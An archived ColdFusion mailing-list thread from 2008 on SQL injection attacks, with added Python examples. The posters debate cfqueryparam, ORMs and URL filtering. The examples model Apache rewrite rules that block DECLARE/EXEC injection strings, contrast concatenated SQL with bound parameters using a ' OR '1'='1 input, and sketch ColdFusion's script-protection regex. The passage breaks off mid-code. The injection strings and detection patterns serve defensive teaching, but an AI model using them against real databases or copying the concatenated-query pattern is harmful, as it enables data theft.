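```python
import re


class RewriteCond:
    """Minimal model of one Apache RewriteCond line: a regex tested against
    a single server variable. Only the [NC] (no-case) flag is modelled."""

    def __init__(self, variable: str, pattern: str, flags: str = ""):
        self.variable = variable
        flag_set = {f.strip().upper() for f in flags.split(",") if f.strip()}
        self.regex = re.compile(pattern, re.IGNORECASE if "NC" in flag_set else 0)

    def matches(self, env: dict) -> bool:
        return self.regex.search(env.get(self.variable, "")) is not None


def first_matching_rule(rules, env: dict):
    """Walk rules in order, like RewriteCond chains feeding a RewriteRule
    with [L]: return the name of the first rule whose conditions all hold,
    or None when the request passes through untouched."""
    for name, conds in rules:
        if all(c.matches(env) for c in conds):
            return name
    return None


# Constructed query strings shaped like the ones quoted in the thread; only
# the keyword casing matters here, so the hex payload is replaced by "...".
ORIGINAL = "';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x...%20AS%20CHAR(4000));EXEC(@S);"
RECASED = ";DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x...%20AS%20CHAR(4000));ExEC(@S);"
BENIGN = "fuseaction=page.download&downloadID=18"

# The case-sensitive form some posters used (no [NC]) ...
CASE_SENSITIVE_RULES = [
    ("declare", [RewriteCond("QUERY_STRING", r"^.*DECLARE.*$")]),
]
# ... and the [NC] form, with a second rule for the EXEC(@ tail as well.
NOCASE_RULES = [
    ("declare", [RewriteCond("QUERY_STRING", r".*DECLARE.*", "NC")]),
    ("exec", [RewriteCond("QUERY_STRING", r"EXEC\(@", "NC")]),
]


def audit(rules) -> dict:
    """Which rule (if any) fires for each sample query string."""
    samples = {"original": ORIGINAL, "recased": RECASED, "benign": BENIGN}
    return {label: first_matching_rule(rules, {"QUERY_STRING": qs})
            for label, qs in samples.items()}


if __name__ == "__main__":
    print("case-sensitive:", audit(CASE_SENSITIVE_RULES))
    print("[NC]:          ", audit(NOCASE_RULES))
```

The case-sensitive rule fires on the original string and is silent on the recased one; the [NC] rule fires on both and leaves the benign query string alone.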

Author:
Mark Mandel
08/16/2008 01:02 AM

What I'm curious about, is that there seems to be no one you can report this to? I got hammered again the other day.. this time as well through whatever form fields they could find.

Mark

----- Excess quoted text cut - see Original Post for more -----

Author:
denstar
08/16/2008 04:13 AM

> What I'm curious about, is that there seems to be noone you can report this to?

Well, I'm pretty sure there is something we could do, but the general attitude seems to be to just suck it up.

And buy some stocks in the tech hardware/broadband market. ;]

--
I got 3 new servers, and a switch!

Author:
Jochem van Dieten
08/16/2008 05:41 AM

Mark Mandel wrote:
> What I'm curious about, is that there seems to be no one you can report this to?

You can report it to the abuse department of the ISP of the originating IP. Just look up the IP delegation and the abuse address is usually right there.

Jochem

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Andrew Scott
08/16/2008 06:45 AM

LOL... Ever heard of IP spoofing? Sure you need to complain about it, but the one thing they need to do is track the packets. This will only work if all paths along the way have log capturing to traverse the MAC address to get the correct IP address.

But yes, start with your IP, give them as much info as they need to do their job with. It is then in their hands to contact the authorities to have the individual charged.

I think this is one reason that there is not enough done when it comes to DoD and SQL injections.

Which leaves me to something I have stated before: why the hell ColdFusion didn't build this under the hood to begin with I do not know. Then it wouldn't matter if you use cfqueryparam or not; there is nothing that this tag does that couldn't be done under the hood. However, it will not stop people from trying :-(

I mean with all the filters that ColdFusion has from Ajax to Flex integration, one more filter for URLs would have been simple.

--
Senior Coldfusion Developer
Aegeon Pty. Ltd.
www.aegeon.com.au
Phone: +613 9015 8628
Mobile: 0404 998 273

Mark Mandel wrote:
> What I'm curious about, is that there seems to be no one you can report this to?

You can report it to the abuse department of the ISP of the originating IP. Just look up the IP delegation and the abuse address is usually right there.

Jochem

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Jochem van Dieten
08/16/2008 08:19 AM

Andrew Scott wrote:
> Ever heard of IP spoofing? Sure you need to complain about it, but the one
> thing they need to do is track the packets.

IP spoofing is really only a significant problem with UDP. With TCP any decent ISP will catch spoofs in their egress filters. Even your cheap, Taiwanese black box NAT router at home will stop spoofing for TCP because it won't be able to match the NAT state.

You just send your complaints to the abuse department of their ISP and they will handle it. Or not, but that is really out of your hands.

> But yes start with your IP, give them as much info as they need to do their
> job with. It is then in their hands to contact the authorities to have the
> individual charged.

You want to charge somebody because his computer is infected with a trojan?

> Which leaves me to something I have stated before, why the hell Coldfusion
> didn't build this under the hood to begin with I do not know. Then it
> wouldn't matter if you use cfqueryparam or not, there is nothing that this
> tag does that couldn't be done under the hood.

There is no way CF can guess the right datatypes to bind my function arguments to when I call a polymorphic function in the database.

> I mean with all the filters that Coldfusion has from ajax to flex
> integration, one more filter for URL's would have been simple.

I haven't mentioned this before because I do believe that filtering request URLs is the wrong approach, but I'll let you in on a little secret: you can plug your filter regular expressions right into neo-security.xml. No need to change anything in any application, you just plug it in and enable the scriptprotect feature.

Jochem

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Andrew Scott
08/16/2008 09:45 AM

Hmmm, I believe IP spoofing is still a huge problem. I know little about it, so no more comment on that, but a quick Google shows that it is still a huge problem.

As for polymorphic functions, that is not the issue. SQL injection is mainly passed via the URL, header or some form of post to the server. A filter can be placed to introspect every request to check the URL for known SQL injection attacks. That would then remove the need to have extra overload for each query, because the initial request would have already been checked.

So if you were to have a component with 20 queries, and have hits of around 1000, the cycles to do SQL protection in the cfqueryparam would be reduced to one check and not 20 * 1000, but 1000 only. Surely that increase in speed has to be worth something? No?

As for what else cfqueryparam offers, this can be handled by the cfquery tag. After all, ColdFusion has been using JDBC drivers for a long time; the cfqueryparam was introduced in the days when ColdFusion was not built on top of Java. That means that the extra features that JDBC drivers introduce (like pooling, binding etc.) can be taken care of under the hood. And with a proper ORM, it would know what datatype you are requesting anyway.

But as I stated once before, ColdFusion 9 with Hibernate native support would eliminate the SQL injection problem. I can't vouch for PHP or .NET, but at least in the Java world ORM reduces that risk to nil. And it's built into the ORM, so if the ORM can't work out your polymorphic function in the database then how does it do it?

This thread was about SQL injection, and a better response would be for the CFML engine to intercept every request and reject anything that looks remotely like a SQL injection attack. If you were in the Java, Grails world there is no such thing as cfqueryparam. They do it under the hood, and there is no real reason that ColdFusion can adopt the same. How hard is that to understand?

--
Senior Coldfusion Developer
Aegeon Pty. Ltd.
www.aegeon.com.au
Phone: +613 9015 8628
Mobile: 0404 998 273

Andrew Scott wrote:
> Ever heard of IP spoofing? Sure you need to complain about it, but the one
> thing they need to do is track the packets.

IP spoofing is really only a significant problem with UDP. With TCP any decent ISP will catch spoofs in their egress filters. Even your cheap, Taiwanese black box NAT router at home will stop spoofing for TCP because it won't be able to match the NAT state.

You just send your complaints to the abuse department of their ISP and they will handle it. Or not, but that is really out of your hands.

> But yes start with your IP, give them as much info as they need to do their
> job with. It is then in their hands to contact the authorities to have the
> individual charged.

You want to charge somebody because his computer is infected with a trojan?

> Which leaves me to something I have stated before, why the hell Coldfusion
> didn't build this under the hood to begin with I do not know. Then it
> wouldn't matter if you use cfqueryparam or not, there is nothing that this
> tag does that couldn't be done under the hood.

There is no way CF can guess the right datatypes to bind my function arguments to when I call a polymorphic function in the database.

> I mean with all the filters that Coldfusion has from ajax to flex
> integration, one more filter for URL's would have been simple.

I haven't mentioned this before because I do believe that filtering request URLs is the wrong approach, but I'll let you in on a little secret: you can plug your filter regular expressions right into neo-security.xml. No need to change anything in any application, you just plug it in and enable the scriptprotect feature.

Jochem

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Jochem van Dieten
08/16/2008 10:38 AM

Andrew Scott wrote:
> I believe IP spoofing is still a huge problem. I know little about it, so no
> more comment on that but a quick google shows that it is still a huge
> problem.

AIDS is a huge problem too. It is also about equally relevant for the current wave of SQL injection attacks.

> As for polymorphic functions, that is not the issue. SQL injection is mainly
> passed via the URL, header or some form of post to the server. A filter can
> be placed to introspect every request to check the URL for known SQL
> injection attacks.

Yes, a sufficiently advanced filter (basically an allow list of values) can do that. But you did not claim a filter could do that, you claimed ColdFusion could do anything cfqueryparam does under the hood. And that is just not true. It is impossible to extrapolate the correct datatype of input BIND variables from the text of the query string. You need code or convention for that.

> I can't vouch for php, .Net but at least in the Java world ORM reduces that
> risk to nil. And its built into the ORM, so if the ORM can't work out your
> polymorphic function in the database then how does it do it?

With an ORM in combination with an untyped language my use case of polymorphic functions would probably end up as a configuration issue in the ORM and the ORM exposing multiple functions to the application.

> This thread was about SQL injection, and a more better response would be for
> the CFML engine to intercept every request and reject anything that looks
> remotely like a sql injection attack.

But you can do that already. Just fiddle with the allowed SQL options in CF and observe the random failures in the application as CF tries to interpret SQL. Whatever the solution is, it is not teaching CF how to interpret SQL. CF is the CFML runtime and should leave the interpretation of SQL to the database.

> If you where in the Java, Grails world there is no such thing as
> cfqueryparam. They do it under the hood, and there is no real reason that
> Coldfusion can adopt the same.

Maybe the tags don't exist, but in Java the concepts do. In fact, the CFML constructs map directly to Java classes:

cfquery -> java -> jdbc -> statement
cfquery + cfqueryparam -> java -> jdbc -> preparedstatement
cfstoredproc -> java -> jdbc -> callablestatement

And I think Dave already explained to you why you shouldn't compare Grails and ColdFusion. Now, if you wanted to compare ModelGlue Unity and Grails, you will see that neither exposes cfqueryparam like functionality to the programmer. (But please don't claim the concepts aren't there, they are just hidden behind an ORM).

Jochem
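The Statement versus PreparedStatement distinction Jochem maps cfquery and cfqueryparam onto, shown as an added example that is not part of this thread: Python's sqlite3 stands in for JDBC, and the users table, its rows and the two lookup functions are constructed for this illustration.

```python
import sqlite3

# Constructed in-memory fixture standing in for an application database.
# The table, the rows and the sqlite3 stand-in for JDBC are assumptions of
# this example; the thread itself talks about ColdFusion tags and JDBC classes.
SAMPLE_USERS = [("alice", 1), ("bob", 0), ("o'brien", 1)]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, active INTEGER)"
    )
    conn.executemany("INSERT INTO users (username, active) VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def lookup_concatenated(conn, username):
    """<cfquery> with a bare #username# (JDBC Statement): the value is spliced
    into the SQL text, so the database parses it as part of the statement."""
    sql = "SELECT id, username FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def lookup_bound(conn, username):
    """<cfquery> + <cfqueryparam> (JDBC PreparedStatement): the SQL text is fixed
    and the value is bound separately, so it is only ever compared as data."""
    sql = "SELECT id, username FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def compare(username):
    """Run both variants on one input and report what each did.
    Returns (concatenated_result, bound_result); a result is either a list of
    rows or the string 'error' when the database rejected the generated SQL."""
    conn = make_db()
    try:
        concatenated = lookup_concatenated(conn, username)
    except sqlite3.Error:
        concatenated = "error"
    bound = lookup_bound(conn, username)
    conn.close()
    return concatenated, bound


if __name__ == "__main__":
    # A legitimate name with an apostrophe: concatenation produces invalid SQL,
    # binding finds the row.
    print(compare("o'brien"))
    # A string that merely looks like SQL: concatenation changes the query and
    # returns every user, binding treats it as an (unmatched) username.
    print(compare("' OR '1'='1"))
```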

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Andrew Scott
08/16/2008 11:13 AM

Hmm, I wasn't trying to compare ColdFusion to Grails, I used Grails as an example because it relies heavily on an ORM. The ORM has the needed datatypes for the DB (or bind / prepared statements), but when it comes to SQL injection, it doesn't appear to be an issue. Please read what I said, I wasn't trying to compare apples to oranges. But they both have the ability to be infected; it is up to how that protection is put into place as to how much work is involved by the developer.

I stand by the fact that cfqueryparam can and should be taken care of under the hood. Other languages are doing it, so what does that tell you? That way older code can automatically be protected behind the scenes with no change to the application you design. It's not rocket science, but it is something to consider.

Hibernate has no problems with SQL injection. Why is that? Because Hibernate DOES use prepared statements under the hood, so if it can, there is no reason why ColdFusion can't.

--
Senior Coldfusion Developer
Aegeon Pty. Ltd.
www.aegeon.com.au
Phone: +613 9015 8628
Mobile: 0404 998 273

Andrew Scott wrote:
> I believe IP spoofing is still a huge problem. I know little about it, so no
> more comment on that but a quick google shows that it is still a huge
> problem.

AIDS is a huge problem too. It is also about equally relevant for the current wave of SQL injection attacks.

> As for polymorphic functions, that is not the issue. SQL injection is mainly
> passed via the URL, header or some form of post to the server. A filter can
> be placed to introspect every request to check the URL for known SQL
> injection attacks.

Yes, a sufficiently advanced filter (basically an allow list of values) can do that. But you did not claim a filter could do that, you claimed ColdFusion could do anything cfqueryparam does under the hood. And that is just not true. It is impossible to extrapolate the correct datatype of input BIND variables from the text of the query string. You need code or convention for that.

> I can't vouch for php, .Net but at least in the Java world ORM reduces that
> risk to nil. And its built into the ORM, so if the ORM can't work out your
> polymorphic function in the database then how does it do it?

With an ORM in combination with an untyped language my use case of polymorphic functions would probably end up as a configuration issue in the ORM and the ORM exposing multiple functions to the application.

> This thread was about SQL injection, and a more better response would be for
> the CFML engine to intercept every request and reject anything that looks
> remotely like a sql injection attack.

But you can do that already. Just fiddle with the allowed SQL options in CF and observe the random failures in the application as CF tries to interpret SQL. Whatever the solution is, it is not teaching CF how to interpret SQL. CF is the CFML runtime and should leave the interpretation of SQL to the database.

> If you where in the Java, Grails world there is no such thing as
> cfqueryparam. They do it under the hood, and there is no real reason that
> Coldfusion can adopt the same.

Maybe the tags don't exist, but in Java the concepts do. In fact, the CFML constructs map directly to Java classes:

cfquery -> java -> jdbc -> statement
cfquery + cfqueryparam -> java -> jdbc -> preparedstatement
cfstoredproc -> java -> jdbc -> callablestatement

And I think Dave already explained to you why you shouldn't compare Grails and ColdFusion. Now, if you wanted to compare ModelGlue Unity and Grails, you will see that neither exposes cfqueryparam like functionality to the programmer. (But please don't claim the concepts aren't there, they are just hidden behind an ORM).

Jochem

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Jochem van Dieten
08/16/2008 11:33 AM

Andrew Scott wrote:
> I stand by the fact that cfqueryparam, can and should be taken care of under
> the hood. Other languages are doing it, so what does that tell you?

It tells me that they need additional configuration or convention. I have 2 functions with the following signatures in my database:

find(needle:char, haystack:text):boolean
find(needle:varchar, haystack:text):boolean

I call the database in one place using:

<cfquery ...>
  SELECT find(
    <cfqueryparam cfsqltype="cf_sql_varchar" value="#x#" />,
    <cfqueryparam cfsqltype="cf_sql_varchar" value="#y#" />
    )
</cfquery>

In another place I use:

<cfquery ...>
  SELECT find(
    <cfqueryparam cfsqltype="cf_sql_char" value="#x#" />,
    <cfqueryparam cfsqltype="cf_sql_varchar" value="#y#" />
    )
</cfquery>

Along comes your ColdFusion version that can determine datatypes to bind to automagically. So now I start using:

<cfquery ...>
  SELECT find('#x#', '#y#')
</cfquery>

But which of the two find() functions in the database is going to get executed? The only way to make sure a specific find() function is executed in the database is by configuring the ORM to do so. Fine, problem solved. But that is not under the hood. ORMs need configuration too. That is not under the hood.

Jochem

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Andrew Scott
08/16/2008 11:40 AM

Have you ever done any GORM work? Now technically, embedding Hibernate into ColdFusion would be under the hood as far as ColdFusion is concerned. I mean, I might as well by your reasoning say that ajaxUI is not under the hood in ColdFusion because it uses a 3rd party library to do its work.

In the event that ColdFusion does incorporate Hibernate it will technically be under the hood, because your tags / functions call internal wrappers to ColdFusion to do the work for you. So technically GORM and its Domain Driven Design is considered to be under the hood.

Technically....

--
Senior Coldfusion Developer
Aegeon Pty. Ltd.
www.aegeon.com.au
Phone: +613 9015 8628
Mobile: 0404 998 273

Andrew Scott wrote:
> I stand by the fact that cfqueryparam, can and should be taken care of under
> the hood. Other languages are doing it, so what does that tell you?

It tells me that they need additional configuration or convention. I have 2 functions with the following signatures in my database:

find(needle:char, haystack:text):boolean
find(needle:varchar, haystack:text):boolean

I call the database in one place using:

<cfquery ...>
  SELECT find(
    <cfqueryparam cfsqltype="cf_sql_varchar" value="#x#" />,
    <cfqueryparam cfsqltype="cf_sql_varchar" value="#y#" />
    )
</cfquery>

In another place I use:

<cfquery ...>
  SELECT find(
    <cfqueryparam cfsqltype="cf_sql_char" value="#x#" />,
    <cfqueryparam cfsqltype="cf_sql_varchar" value="#y#" />
    )
</cfquery>

Along comes your ColdFusion version that can determine datatypes to bind to automagically. So now I start using:

<cfquery ...>
  SELECT find('#x#', '#y#')
</cfquery>

But which of the two find() functions in the database is going to get executed? The only way to make sure a specific find() function is executed in the database is by configuring the ORM to do so. Fine, problem solved. But that is not under the hood. ORMs need configuration too. That is not under the hood.

Jochem

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Andrew Scott
08/16/2008 11:17 AM

--
Senior Coldfusion Developer
Aegeon Pty. Ltd.
www.aegeon.com.au
Phone: +613 9015 8628
Mobile: 0404 998 273

And you haven't seen Grails then; you can't get any more of a dynamic language than that :-) It uses GORM, which is an entry point to Hibernate, and guess what, it takes care of everything I spoke about. Still no reason ColdFusion can't, and I will stand by that.

Andrew Scott wrote:
> I can't vouch for php, .Net but at least in the Java world ORM reduces that
> risk to nil. And its built into the ORM, so if the ORM can't work out your
> polymorphic function in the database then how does it do it?

With an ORM in combination with an untyped language my use case of polymorphic functions would probably end up as a configuration issue in the ORM and the ORM exposing multiple functions to the application.

Jochem

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
James Holmes
08/16/2008 11:39 AM

You'll be happy to know that CF9 is rumoured to include Hibernate with a corresponding set of tags, so CF should indeed be able to deal with this under the hood. ----- Excess quoted text cut - see Original Post for more ----- -- mxAjax / CFAjax docs and other useful articles: http://www.bifrost.com.au/blog/

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Andrew Scott
08/16/2008 11:41 AM

Man, you're about 6 months late with that news....

--
Senior Coldfusion Developer
Aegeon Pty. Ltd.
www.aegeon.com.au
Phone: +613 9015 8628
Mobile: 0404 998 273

You'll be happy to know that CF9 is rumoured to include Hibernate with a corresponding set of tags, so CF should indeed be able to deal with this under the hood.

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Dominic Watson
08/16/2008 12:33 PM

>I can't vouch for php, .Net but at least in the Java world ORM reduces that
>risk to nil. And its built into the ORM, so if the ORM can't work out your
>polymorphic function in the database then how does it do it?

PHP is as ColdFusion and Java; you can use a plain query string or use a parameterised statement / prepared statement. If you use the prepared statement, you are protected from SQL injection (unless your SQL is running some code on the db that takes your input and runs it as dynamic SQL, of course ;).

I think the main trouble with cfqueryparam is that it has not been pushed enough in the documentation and in books. This is why reams of applications are not using it: the people writing the queries did not know any different. I would say the same is true of PHP and prepared statements, though I have not enough experience in PHP to vouch for that.

ORM is brilliant and Hibernate appears to be great news for CF9. However, I believe that ORM is an application design *choice* and not something to be forced by the language (therefore Hibernate will not interfere with cfquery, I presume). That said, I think that if CF could make use of Hibernate's data mapping knowledge to rewrite a plain query to be a parameterised one, that would be great news indeed. I think that is what Andrew is getting at: if it could be done efficiently and without configuration or convention, that would have to be welcome.

A question for anyone who knows Hibernate then: does it require configuration per database, rely on convention, or does it query the schema to generate its mappings automatically?

Dominic

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
James Holmes
08/16/2008 10:19 PM

So for six months you've known the feature is coming yet you're still arguing about it now? Do you just like wasting people's time?

> Man, you're about 6 months late with that news....
>

--
mxAjax / CFAjax docs and other useful articles: http://www.bifrost.com.au/blog/

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Andrew Scott
08/16/2008 10:55 PM

No, I am not arguing about it. I am saying that there is no reason that ColdFusion could not do what I said it could. It only means that with the release of ColdFusion 9, it is more of a possibility that SQL injection will become a thing of the past for ColdFusion. It doesn't excuse the fact that when cfqueryparam was introduced, it couldn't have done something like this a long time ago.

The argument came about because people believed it was not possible for ColdFusion to do this stuff under the hood; the reality was that it could have a long time ago. It just never was a request or thought about before.

If you read anything I have said, you would see I am not arguing about it, but making a statement that it was and could have been possible. Nothing more, nothing less. It was everyone else who disagreed, well almost everyone else.

--
Senior Coldfusion Developer
Aegeon Pty. Ltd.
www.aegeon.com.au
Phone: +613 9015 8628
Mobile: 0404 998 273

So for six months you've known the feature is coming yet you're still arguing about it now? Do you just like wasting people's time?

> Man, you're about 6 months late with that news....
>

--
mxAjax / CFAjax docs and other useful articles: http://www.bifrost.com.au/blog/

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
denstar
08/16/2008 11:49 PM

There are always trade-offs. Everything you add is a few (or more) cycles, and you've got to at least sorta aim for optimization (if ambiguously). Like, the hibernate stuff seems plenty fast to me right now, but what happens when I toss a ton of requests at it, or use large tables or something? It would be cool to have a switch to turn it on tho, and leave it on by default.  :-) ----- Excess quoted text cut - see Original Post for more -----

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Andrew Scott
08/17/2008 12:08 AM

Well, at the end of the day, I am currently using Hibernate in ColdFusion thanks to Joe Reinhart, I think is the one I am using. But I know plenty of people are looking into it at the moment.

I have even looked at using GORM in ColdFusion, to help with DDD. But I haven't had the time to investigate as yet. But I am very happy to even just use POJOs for now.

--
Senior Coldfusion Developer
Aegeon Pty. Ltd.
www.aegeon.com.au
Phone: +613 9015 8628
Mobile: 0404 998 273

There are always trade-offs. Everything you add is a few (or more) cycles, and you've got to at least sorta aim for optimization (if ambiguously). Like, the hibernate stuff seems plenty fast to me right now, but what happens when I toss a ton of requests at it, or use large tables or something? It would be cool to have a switch to turn it on tho, and leave it on by default. :-)

> No I am not arguing about it, I am saying that there is no reason that
> ColdFusion could not do what I said it could. It only means that with the
> release of ColdFusion 9, it is more of a possibility that SQL Injection will

----- Excess quoted text cut - see Original Post for more -----

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
denstar
08/17/2008 12:38 AM

> Well at the end of the day, I am currently using hibernate in ColdFusion
> thanks to Joe Reinhart I think is the one I am using. But I now plenty of
> people are looking into it at the moment.

Hibernate is easy to use with CF8 and Java. Few lines of code. Now, CF objects and Hibernate is another matter. :-)

The first thing I did was hook up HibernateTools (DB reverse engineering into POJOs or HBMs), but I didn't feel that was right for the majority of CF devs. And having to restart things to see changes and whatnot? Neh. Crazy classloading-ness? Neh. Hooking into a Java-based model? Sure. Taking advantage of all the awesome Java tools? Priceless.

But it ain't CF, per se. Not that that matters, of course, I just decided I wanted it to, for kicks.

> I have even looked at using GORM in Coldfusion, to help with DDD. But
> haven't had the time to investigate as of yet. But I am very happy to even
> just use POJO's for now.

Right on. Looks like a GORM-ish deal wouldn't be hard to rock with about any ORM.

When you talk about DDD, how are you representing the domain? Are you using a modeling language?

Thanks,
DeN

--
Nothing except the mint can make money without advertising.
Thomas B. Macaulay

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Andrew Scott
08/17/2008 05:23 AM

LoL... At the end of the day I see Hibernate as a great tool, and it hasn't been till recently that I discovered how easy it is to use. Not perfect or as good as GORM... But hey, I am not complaining...

--
Senior Coldfusion Developer
Aegeon Pty. Ltd.
www.aegeon.com.au
Phone: +613 9015 8628
Mobile: 0404 998 273

> Well at the end of the day, I am currently using hibernate in ColdFusion
> thanks to Joe Reinhart I think is the one I am using. But I now plenty of
> people are looking into it at the moment.

Hibernate is easy to use with CF8 and Java. Few lines of code. Now, CF objects and Hibernate is another matter. :-)

The first thing I did was hook up HibernateTools (DB reverse engineering into POJOs or HBMs), but I didn't feel that was right for the majority of CF devs. And having to restart things to see changes and whatnot? Neh. Crazy classloading-ness? Neh. Hooking into a Java-based model? Sure. Taking advantage of all the awesome Java tools? Priceless.

But it ain't CF, per se. Not that that matters, of course, I just decided I wanted it to, for kicks.

> I have even looked at using GORM in Coldfusion, to help with DDD. But
> haven't had the time to investigate as of yet. But I am very happy to even
> just use POJO's for now.

Right on. Looks like a GORM-ish deal wouldn't be hard to rock with about any ORM.

When you talk about DDD, how are you representing the domain? Are you using a modeling language?

Thanks,
DeN

--
Nothing except the mint can make money without advertising.
Thomas B. Macaulay

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Dave Francis
08/17/2008 11:32 AM

>But hey I am not complaining...

Who are you, and why are you using Andrew's email address?

LoL... At the end of the day I see hibernate as a great tool, and hasn't been till recently that I discovered how easy it is to use. Not perfect or as good as GORM... But hey I am not complaining...

--
Senior Coldfusion Developer
Aegeon Pty. Ltd.
www.aegeon.com.au
Phone: +613 9015 8628

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
denstar
08/16/2008 11:17 AM

----- Excess quoted text cut - see Original Post for more -----

Unrelated, but isn't our government pretty much listening to all the chatter across the wires? Pity to think we couldn't take advantage of that infrastructure. </joke>

[...]

> There is no way CF can guess the right datatypes to bind my function
> arguments to when I call a polymorphic function in the database.

This, I'm curious about. Aren't there ways to use some type of introspection? Bah. I see your point; even if so, you end up having to understand every type of SQL, if from a different angle. No easy Java SQL parser to throw in, I guess. Still, there aren't *that* many DBs out there that would need to be supported... :-)p

> I haven't mentioned this before because I do believe that filtering
> request URLs is the wrong approach

Care to elaborate on this? Even just a couple of rules in an Apache conf file has helped quite a bit to eliminate these spam hits on CF, without impacting anything else that I'm aware of... are you thinking something closer to the network level?

Every piece you add opens holes, and I used to sorta shun rewriting because of that, but, who am I kidding? :-) And it seems like rewriting is pretty commonplace, so pretty vetted. But I'd love to hear your take on the URL request filtering, Jochem!

:Denny

--
Few of the many wise apothegms which have been uttered have prevented a single foolish action.
Thomas B. Macaulay

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Andrew Scott
08/16/2008 11:28 AM

Actually, that should have been the reverse on URL filtering :-( In other words, I should or could write a filter to do the checking of SQL injections. Sorry, my bad there. But it is only one way to do it.

Anyway, as I do Grails work I dug this link up for you all...

http://docs.codehaus.org/display/GRAILS/Security

So it is possible to do under the hood. Now I can't vouch for Transfer, but I do know Mark would have used cfqueryparam. Now as it is written in ColdFusion in most parts, it does take care of the fact that as a developer I don't need to worry about the SQL injection, as I am confident that Transfer has taken care of it for me.

That is a typical example of how ColdFusion can and should do it under the hood. And take particular notice how the data is escaped when committing to the database.

--
Senior Coldfusion Developer
Aegeon Pty. Ltd.
www.aegeon.com.au
Phone: +613 9015 8628
Mobile: 0404 998 273

> Andrew Scott wrote:
>> Ever heard of IP spoofing? Sure you need to complain about it, but the one
>> thing they need to do is track the packets.
>
> IP spoofing is really only a significant problem with UDP. With TCP any
> decent ISP will catch spoofs in their egress filters. Even your cheap,
> Taiwanese black box NAT router at home will stop spoofing for TCP
> because it won't be able to match the NAT state.

Unrelated, but isn't our government pretty much listening to all the chatter across the wires? Pity to think we couldn't take advantage of that infrastructure. </joke>

[...]

> There is no way CF can guess the right datatypes to bind my function
> arguments to when I call a polymorphic function in the database.

This, I'm curious about. Aren't there ways to use some type of introspection? Bah. I see your point; even if so, you end up having to understand every type of SQL, if from a different angle. No easy Java SQL parser to throw in, I guess. Still, there aren't *that* many DBs out there that would need to be supported... :-)p

> I haven't mentioned this before because I do believe that filtering
> request URLs is the wrong approach

Care to elaborate on this? Even just a couple of rules in an Apache conf file has helped quite a bit to eliminate these spam hits on CF, without impacting anything else that I'm aware of... are you thinking something closer to the network level?

Every piece you add opens holes, and I used to sorta shun rewriting because of that, but, who am I kidding? :-) And it seems like rewriting is pretty commonplace, so pretty vetted. But I'd love to hear your take on the URL request filtering, Jochem!

:Denny

--
Few of the many wise apothegms which have been uttered have prevented a single foolish action.
Thomas B. Macaulay

Author:
Brad Wood
08/16/2008 12:14 PM

>> I haven't mentioned this before because I do believe that filtering
>> request URLs is the wrong approach
>
> Care to elaborate on this?

Denstar, dig out your neo-security.xml file. In my Windows CF8 standalone install it is located in C:\ColdFusion8\lib\neo-security.xml

Look at the following section:

   <var name="CrossSiteScriptPatterns">
    <struct type="coldfusion.server.ConfigMap">
     <var name="<\s*(object|embed|script|applet|meta)">
       <string><InvalidTag</string>
     </var>
    </struct>
   </var>

When you check the "Enable Global Script Protection" check box on the Settings page of ColdFusion Administrator, requests are filtered if anything in the Form, URL, CGI, or Cookie scope matches this regex: "<\s*(object|embed|script|applet|meta)"

What Jochem is saying is to add to that regex to filter for whatever else you want and enable that setting. While I agree with Jochem that request filtering is NOT the appropriate way to secure your application, this is a rather slick approach.

Also note, this is NOT rewriting. It is not happening at the network level, nor is it happening at the web server level (Apache, IIS). The requests are filtered when they reach ColdFusion.

~Brad

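To make Brad's description concrete, here is an added model (not ColdFusion's own code, and not from anyone on the thread) of what a CrossSiteScriptPatterns entry does when Global Script Protection is enabled: every value in the Form, URL, CGI and Cookie scopes is run through the configured regex and matches are replaced with the configured text, which the quoted neo-security.xml fragment gives as <InvalidTag. The request data is constructed for the example, and case-insensitive matching is an assumption of the model rather than something the thread states about ColdFusion.

```python
import re

# Pattern -> replacement, copied from the neo-security.xml fragment quoted in the
# thread.  Extra patterns added to the config would appear as extra entries here.
CROSS_SITE_SCRIPT_PATTERNS = {
    r"<\s*(object|embed|script|applet|meta)": "<InvalidTag",
}

# Constructed sample request: one dict per ColdFusion scope that the setting
# inspects (Form, URL, CGI, Cookie).  All values are made up for this example.
SAMPLE_REQUEST = {
    "url": {"q": "coldfusion security", "ref": "<  EMBED src=clip.swf>"},
    "form": {
        "comment": "Nice site! <script>document.title</script>",
        "title": "<metadata> for my article",
    },
    "cgi": {"HTTP_USER_AGENT": "Mozilla/5.0 (constructed)"},
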